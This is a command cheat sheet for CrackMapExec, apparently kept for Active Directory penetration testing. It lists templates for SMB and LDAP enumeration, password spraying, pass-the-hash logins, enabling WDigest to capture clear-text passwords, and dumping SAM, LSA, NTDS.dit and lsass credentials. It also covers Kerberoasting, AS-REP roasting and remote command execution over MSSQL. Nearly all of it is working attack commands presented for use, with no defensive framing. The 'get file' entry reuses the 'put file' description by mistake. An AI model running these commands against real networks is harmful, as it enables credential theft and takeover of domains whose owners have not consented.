 % cme, crackmapexec, windows, Active directory

# cme - enumerate hosts, network
Example : cme smb 192.168.1.0/24

https://mpgn.gitbook.io/crackmapexec/ 
cme smb <ip> 

# cme - enumerate password policy
cme smb <ip> -u <user> -p '<password>' --pass-pol 

# cme - enumerate null session
cme smb <ip> -u '' -p '' 

# cme - enumerate anonymous login
cme smb <ip> -u 'a' -p '' 

# cme - enumerate active sessions
cme smb <ip> -u <user> -p '<password>' --sessions 

# cme - enumerate domain users
cme smb <ip> -u <user> -p '<password>' --users 

# cme - enumerate users by bruteforce the RID
cme smb <ip> -u <user> -p '<password>' --rid-brute 

# cme - enumerate domain groups
cme smb <ip> -u <user> -p '<password>' --groups 

# cme - enumerate local groups
cme smb <ip> -u <user> -p '<password>' --local-groups 

# cme - enumerate shares

Enumerate permissions on all shares 
cme smb <ip> -u <user> -p <password> -d <domain> --shares 

# cme - enumerate disks

Enumerate disks on the remote target 
cme smb <ip> -u <user> -p '<password>' --disks 

# cme - enumerate smb target not signed

Maps the network of live hosts and saves a list of only the hosts that  don't require SMB signing. List format is one IP per line 
cme smb <ip> --gen-relay-list smb_targets.txt 

# cme - enumerate logged users
cme smb <ip> -u <user> -p '<password>' --loggedon-users 

# cme - enable wdigest

enable/disable the WDigest provider and dump clear-text credentials from LSA memory. 
cme smb <ip> -u <user|Administrator> -p '<password>' --local-auth --wdigest enable 

# cme - loggout user

Can be useful after enable wdigest to force user to reconnect 
cme smb <ip> -u <user> -p '<password>' -x 'quser'
cme smb <ip> -u <user> -p '<password>' -x 'logoff <id_user>' --no-output 

# cme - local-auth
cme smb <ip> -u <user> -p <password> --local-auth 

# cme - local-auth with hash
cme smb <ip> -u <user> -H <hash> --local-auth 

# cme - domain auth
cme smb <ip> -u <user> -p <password> -d <domain> 

# cme - kerberos auth

Previously import ticket : 
export KRB5CCNAME=/tmp/ticket.ccache 
cme smb <ip> --kerberos 

# cme - Dump SAM

Dump SAM hashes using methods from secretsdump.py
You need at least local admin privilege on the remote target, use option --local-auth if your user is a local account 
cme smb <ip> -u <user> -p <password> -d <domain> --sam 

# cme - Dump LSA

Dump LSA secrets using methods from secretsdump.py
Requires Domain Admin or Local Admin Privileges on target Domain Controller 
cme smb <ip> -u <user> -p <password> -d <domain> --lsa 

# cme - dump ntds.dit

Dump the NTDS.dit from target DC using methods from secretsdump.py
Requires Domain Admin or Local Admin Privileges on target Domain Controller 
cme smb <ip> -u <user> -p <password> -d <domain> --ntds 

# cme - dump lsass
cme smb <ip> -u <user> -p <password> -d <domain> -M lsassy 

# cme - dump lsass - with bloodhond update
cme smb <ip> --local-auth -u <user> -H <hash> -M lsassy -o BLOODHOUND=True NEO4JUSER=<user|neo4j> NEO4JPASS=<neo4jpass|exegol4thewin> 

# cme - password spray (user=password)
cme smb <dc-ip> -u <user.txt> -p <password.txt> --no-bruteforce --continue-on-success 

# cme - password spray multiple test 

(careful on lockout) 
cme smb <dc-ip> -u <user.txt> -p <password.txt> --continue-on-success 

# cme - put file
Send a local file to the remote target 
cme smb <ip> -u <user> -p <password> --put-file <local_file> <remote_path|\\Windows\\Temp\\target.txt> 

# cme - get file
Send a local file to the remote target 
cme smb <ip> -u <user> -p <password> --get-file <remote_path|\\Windows\\Temp\\target.txt> <local_file> 

# cme - ASREPRoast enum without authentication

User can be a wordlist too (user.txt)
Hashcat format  -m 18200  
cme ldap <ip> -u <user> -p '' --asreproast ASREProastables.txt --kdcHost <dc_ip> 

# cme - ASREPRoast enum with authentication

Hashcat format  -m 18200  
cme ldap <ip> -u <user> -p '<password>' --asreproast ASREProastables.txt --kdcHost <dc_ip> 

# cme - Kerberoasting

Hashcat format  -m 13100 
cme ldap <ip> -u <user> -p '<password>' --kerberoasting kerberoastables.txt --kdcHost <dc_ip> 

# cme - Unconstrained delegation

List of all computers et users with the flag TRUSTED_FOR_DELEGATION 
cme ldap <ip> -u <user> -p '<password>' --trusted-for-delegation 

# cme - winrm-auth
cme winrm <ip> -u <user> -p <password> 

# cme - mssql password spray
cme mssql <ip> -u <user.txt> -p <password.txt>  --no-bruteforce 

# cme - mssql execute query
cme mssql <ip> -u <user> -p '<password>' --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;' 

# cme - mssql execute command
cme mssql <ip> -u <user> -p '<password>' --local-auth -x <cmd|whoami> 

= ip: 192.168.1.0/24
